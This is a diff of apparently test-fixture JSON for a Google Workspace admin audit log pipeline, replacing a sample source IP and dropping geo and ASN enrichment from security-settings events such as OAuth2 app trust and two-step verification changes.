@@ -452,35 +362,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:25.351382500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"REMOVE_FROM_TRUSTED_OAUTH2_APPS\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"OAUTH2_APP_ID\",\"value\":\"id\"},{\"name\":\"OAUTH2_APP_NAME\",\"value\":\"appname\"},{\"name\":\"OAUTH2_APP_TYPE\",\"value\":\"CHROME_EXTENSION\"}]}}", + "ingested": "2021-12-09T13:38:53.079558700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"REMOVE_FROM_TRUSTED_OAUTH2_APPS\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"OAUTH2_APP_ID\",\"value\":\"id\"},{\"name\":\"OAUTH2_APP_NAME\",\"value\":\"appname\"},{\"name\":\"OAUTH2_APP_TYPE\",\"value\":\"CHROME_EXTENSION\"}]}}", "provider": "admin", "action": "REMOVE_FROM_TRUSTED_OAUTH2_APPS", "id": "1", 
@@ -510,7 +402,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -536,35 +428,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:25.351384300Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"BLOCK_ON_DEVICE_ACCESS\",\"parameters\":[{\"name\":\"OAUTH2_SERVICE_NAME\",\"value\":\"APPS_SCRIPT\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:53.079563900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"BLOCK_ON_DEVICE_ACCESS\",\"parameters\":[{\"name\":\"OAUTH2_SERVICE_NAME\",\"value\":\"APPS_SCRIPT\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "BLOCK_ON_DEVICE_ACCESS", "id": "1", @@ -594,7 +468,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -618,35 +492,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:25.351386200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_TWO_STEP_VERIFICATION_ENROLLMENT_PERIOD_DURATION\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:53.079570300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_TWO_STEP_VERIFICATION_ENROLLMENT_PERIOD_DURATION\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": 
"CHANGE_TWO_STEP_VERIFICATION_ENROLLMENT_PERIOD_DURATION", "id": "1", @@ -677,7 +533,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -701,35 +557,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:25.351388300Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_TWO_STEP_VERIFICATION_FREQUENCY\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:53.079576700Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_TWO_STEP_VERIFICATION_FREQUENCY\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_TWO_STEP_VERIFICATION_FREQUENCY", "id": "1", 
@@ -760,7 +598,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -784,35 +622,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:25.351390300Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_TWO_STEP_VERIFICATION_GRACE_PERIOD_DURATION\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:53.079583Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_TWO_STEP_VERIFICATION_GRACE_PERIOD_DURATION\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_TWO_STEP_VERIFICATION_GRACE_PERIOD_DURATION", 
 "id": "1",
@@ -843,7 +663,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -867,35 +687,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:25.351392100Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_TWO_STEP_VERIFICATION_START_DATE\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", + "ingested": "2021-12-09T13:38:53.079589500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_TWO_STEP_VERIFICATION_START_DATE\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"}]}}", "provider": "admin", "action": "CHANGE_TWO_STEP_VERIFICATION_START_DATE", "id": "1", 
@@ -926,7 +728,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -950,35 +752,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:25.351394Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_ALLOWED_TWO_STEP_VERIFICATION_METHODS\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"ALLOWED_TWO_STEP_VERIFICATION_METHOD\",\"value\":\"ONLY_SECURITY_KEY\"}]}}", + "ingested": "2021-12-09T13:38:53.079596200Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_ALLOWED_TWO_STEP_VERIFICATION_METHODS\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"ALLOWED_TWO_STEP_VERIFICATION_METHOD\",\"value\":\"ONLY_SECURITY_KEY\"}]}}", "provider": "admin", "action": "CHANGE_ALLOWED_TWO_STEP_VERIFICATION_METHODS", "id": "1", 
@@ -1009,7 +793,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1031,35 +815,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:25.351395800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"TOGGLE_CAA_ENABLEMENT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", + "ingested": "2021-12-09T13:38:53.079602500Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"TOGGLE_CAA_ENABLEMENT\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"}]}}", "provider": "admin", "action": "TOGGLE_CAA_ENABLEMENT", "id": "1", @@ -1089,7 +855,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -1111,35 +877,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:25.351397500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_CAA_ERROR_MESSAGE\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:53.079608800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_CAA_ERROR_MESSAGE\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "CHANGE_CAA_ERROR_MESSAGE", "id": "1", @@ -1169,7 +917,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -1193,35 +941,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:25.351399300Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_CAA_APP_ASSIGNMENTS\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"CAA_ASSIGNMENTS_NEW\",\"value\":\"new\"},{\"name\":\"CAA_ASSIGNMENTS_OLD\",\"value\":\"old\"},{\"name\":\"GROUP_NAME\",\"value\":\"group\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:53.079615100Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"CHANGE_CAA_APP_ASSIGNMENTS\",\"parameters\":[{\"name\":\"APPLICATION_NAME\",\"value\":\"app\"},{\"name\":\"CAA_ASSIGNMENTS_NEW\",\"value\":\"new\"},{\"name\":\"CAA_ASSIGNMENTS_OLD\",\"value\":\"old\"},{\"name\":\"GROUP_NAME\",\"value\":\"group\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": 
"admin", "action": "CHANGE_CAA_APP_ASSIGNMENTS", "id": "1", @@ -1251,7 +981,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { @@ -1275,35 +1005,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:25.351401Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"UNTRUST_DOMAIN_OWNED_OAUTH2_APPS\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:53.079621300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"UNTRUST_DOMAIN_OWNED_OAUTH2_APPS\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "UNTRUST_DOMAIN_OWNED_OAUTH2_APPS", "id": "1", @@ -1333,7 +1045,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -1357,35 +1069,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:25.351402800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"TRUST_DOMAIN_OWNED_OAUTH2_APPS\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:53.079627800Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"TRUST_DOMAIN_OWNED_OAUTH2_APPS\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "TRUST_DOMAIN_OWNED_OAUTH2_APPS", "id": "1", 
@@ -1407,31 +1101,13 @@ }, { "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "tags": [ "preserve_original_event" @@ -1445,7 +1121,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -1469,8 +1145,8 @@ "id": "1" }, "event": { - "ingested": "2021-06-09T10:57:25.351404500Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"ENABLE_NON_ADMIN_USER_PASSWORD_RECOVERY\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", + "ingested": "2021-12-09T13:38:53.079634100Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"SECURITY_SETTINGS\",\"name\":\"ENABLE_NON_ADMIN_USER_PASSWORD_RECOVERY\",\"parameters\":[{\"name\":\"GROUP_EMAIL\",\"value\":\"group@example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"OLD_VALUE\",\"value\":\"old\"},{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"}]}}", "provider": "admin", "action": "ENABLE_NON_ADMIN_USER_PASSWORD_RECOVERY", "id": "1", @@ -1508,7 +1184,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
